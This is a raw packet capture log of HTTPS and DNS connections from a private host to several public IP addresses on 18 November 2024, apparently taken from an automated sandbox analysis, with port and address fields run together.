                                                                                                                                          Nov 18, 2024 06:48:27.450624943 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.450820923 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:27.450894117 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.451472998 CET55212443192.168.2.1618.66.102.12
                                                                                                                                          Nov 18, 2024 06:48:27.451483965 CET4435521218.66.102.12192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.012449980 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.013012886 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.013036966 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.013515949 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.014519930 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.014519930 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.014544010 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.014614105 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.064209938 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.206367016 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.206406116 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.206495047 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.206512928 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.206515074 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.206614017 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.207834005 CET55213443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:28.207849979 CET4435521352.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.216815948 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:28.216844082 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.216906071 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:28.217241049 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:28.217262983 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.758445978 CET6071153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:28.763398886 CET53607111.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:28.763505936 CET6071153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:28.763897896 CET6071153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:28.768702030 CET53607111.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.061053991 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.061384916 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.061397076 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.061753035 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.062057018 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.062129974 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.062207937 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.062227964 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.062235117 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.358674049 CET53607111.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.359110117 CET6071153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:29.364516020 CET53607111.1.1.1192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.364579916 CET6071153192.168.2.161.1.1.1
                                                                                                                                          Nov 18, 2024 06:48:29.540497065 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.541130066 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.541213989 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.541601896 CET55215443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.541611910 CET4435521535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.544256926 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:29.544295073 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.544385910 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:29.544636011 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:29.544648886 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.552939892 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.552953959 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.553025961 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.553122044 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.553152084 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.553212881 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.553404093 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.553415060 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:29.553559065 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:29.553572893 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.393656969 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.393990040 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:30.394016027 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.394401073 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.394783020 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:30.394845963 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.394956112 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:30.397356987 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.397578001 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.397587061 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.397912979 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.398264885 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.398324013 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.398392916 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.404632092 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.404931068 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.404949903 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.405257940 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.405626059 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.405678988 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.439327955 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.439353943 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.449187994 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.592514038 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.592601061 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.592664003 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:30.593717098 CET60714443192.168.2.1652.223.1.163
                                                                                                                                          Nov 18, 2024 06:48:30.593741894 CET4436071452.223.1.163192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.655778885 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.655798912 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.655869961 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.655896902 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.655951023 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.656697035 CET60715443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.656713963 CET4436071535.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.669195890 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.669619083 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.669640064 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.669729948 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.669919968 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.669934988 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.715334892 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973681927 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973701954 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973709106 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973761082 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973808050 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973822117 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.973833084 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.973882914 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.975572109 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.975591898 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.975682974 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:30.975687981 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:30.975728035 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.100655079 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.100676060 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.100800037 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.100807905 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.100856066 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.101820946 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.101839066 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.101886988 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.101914883 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.101919889 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.101949930 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.101955891 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.101978064 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.102005005 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.102319002 CET60716443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.102329016 CET4436071635.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.501463890 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.501782894 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.501805067 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.502182007 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.502484083 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.502549887 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.502618074 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.547337055 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.800668001 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.800702095 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.800721884 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.800827026 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.800838947 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.800890923 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.802654982 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.802690983 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.802762032 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.802768946 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.802814007 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.916282892 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.916310072 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.916405916 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.916433096 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.916501999 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.917335987 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.917352915 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.917423964 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.917431116 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.917474031 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.918858051 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.918874979 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.918943882 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.918951035 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.918986082 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.920614958 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.920630932 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.920691967 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:31.920697927 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:31.920754910 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.031934977 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.031965971 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.032068968 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.032083035 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.032143116 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034722090 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034749985 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034802914 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034809113 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034837008 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034858942 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034859896 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034874916 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034899950 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034914970 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034921885 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.034950018 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.034965038 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.035309076 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.035341024 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.035382032 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.035388947 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.035417080 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.035438061 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.035866976 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.035893917 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.035948038 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.035953999 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.036003113 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.036904097 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.036931038 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.036981106 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.036987066 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.037014961 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.037034035 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.147542000 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.147563934 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.147661924 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.147681952 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.147737980 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.148387909 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.148406982 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.148472071 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.148480892 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.148524046 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.149030924 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.149046898 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.149105072 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.149112940 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.149149895 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.149986029 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.150002003 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.150064945 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.150072098 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.150120020 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.152683973 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.152707100 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.152760029 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.152765989 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.152810097 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.153152943 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.153168917 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.153212070 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.153218985 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.153244019 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.153264046 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.264445066 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.264467001 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.264642000 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.264671087 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.264724016 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.264903069 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.264919996 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.264977932 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.264985085 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265028000 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.265417099 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265434027 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265499115 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.265506029 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265547991 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.265779018 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265793085 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265839100 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.265846968 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.265902996 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.266629934 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.266645908 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.266705990 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.266717911 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.266731977 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.266762018 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.266801119 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.267529964 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.267548084 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.267613888 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.267621994 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.311266899 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.516736984 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.516802073 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.516843081 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.516868114 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.516942978 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.516942978 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517601013 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517644882 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517678976 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517685890 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517724037 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517743111 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517859936 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517901897 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517925978 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517932892 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.517966986 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.517973900 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.518646002 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.518685102 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.518716097 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.518722057 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.518754005 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.518774033 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.519814968 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.519877911 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.519908905 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.519916058 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.519949913 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.519970894 CET60717443192.168.2.1635.71.186.151
                                                                                                                                          Nov 18, 2024 06:48:32.520299911 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.520340919 CET4436071735.71.186.151192.168.2.16
                                                                                                                                          Nov 18, 2024 06:48:32.520378113 CET60717443192.168.2.1635.71.186.151
